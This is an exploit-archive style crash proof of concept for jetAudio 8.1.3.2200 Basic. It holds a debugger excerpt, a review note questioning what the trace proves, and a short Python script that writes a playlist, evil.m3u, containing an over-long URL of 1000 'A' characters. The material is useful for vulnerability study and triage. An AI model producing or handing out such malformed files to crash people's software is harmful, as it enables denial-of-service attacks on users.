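# Exploit Title : jetAudio 8.1.3.2200 Basic (m3u) Crash POC
# Product : jetAudio Basic
# Date : 27.12.2014
# Exploit Author : Hadji Samir s-dz@hotmail.fr
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3.2200 Basic
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : Windows 7 x86 fr
#============================================================================================
# Open created POC file (evil.m3u) with jetAudio
# Details
# ((2bb0.2a60): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=0012fb0c edx=76ed64f4 esi=fffffffe edi=00000000
# eip=76f2e60e esp=0012fb28 ebp=0012fb54 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# ntdll!LdrVerifyImageMatchesChecksum+0x633:
# 76f2e60e cc int 3
#
# 0:000> kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 0012fb54 76f0e2d1 7ffdf000 7ffd5000 76f6714c ntdll!LdrVerifyImageMatchesChecksum+0x633
# 0012fcb0 76ef8fc0 0012fd24 76e90000 7346e5a2 ntdll!RtlTimeToElapsedTimeFields+0x4e3d
# 0012fd00 76eeb2c5 0012fd24 76e90000 00000000 ntdll!vsnwprintf+0x3eb
# 0012fd10 00000000 0012fd24 76e90000 00000000 ntdll!LdrInitializeThunk+0x10
#============================================================================================
#
# NOTE(review): how far the debugger excerpt above supports the "crash" claim.
#   - The only event recorded is exception code 80000003 (a breakpoint) at an
#     `int 3` inside ntdll, on a stack that bottoms out in
#     ntdll!LdrInitializeThunk. No access violation is shown and no register
#     holds the 0x41 filler written below, so the excerpt does not show which
#     jetAudio code path fails. It looks like a loader-time breakpoint rather
#     than the fault itself; confirm with a dump taken at the failure.
#   - ntdll symbols were not loaded ("Defaulted to export symbols") and the
#     unwinder warns the frames may be wrong, so the function names in the
#     trace are nearest-export guesses, not the real call chain.
#   - The impact stated on this page is a crash when the playlist is opened.
#     Nothing here demonstrates more than that, and no fixed version is named.
#   - For triage: the generated file is one text line, "http://" followed by
#     1000 'A' characters (1007 characters in total). Playlist files from
#     untrusted sources are untrusted input to the player; an over-long URL
#     entry like this is the thing to look for when screening such files.
#
# The interpreter line below is kept where the original has it; it only takes
# effect when it is the first line of the file.
#!/usr/bin/python
from struct import pack  # imported by the original PoC; not used below

# Playlist entry template: one URL line whose host part is filled in below.
m3u = ("http://%s")

# Filler for the host part: 1000 bytes of 0x41 ('A').
buf = "\x41" * 1000
m3u %= buf

# Write the one-line playlist into the current working directory. The context
# manager closes the handle even if the write raises, which the original
# open()/write()/close() sequence did not guarantee.
with open("evil.m3u", "w") as fd:
    fd.write(m3u)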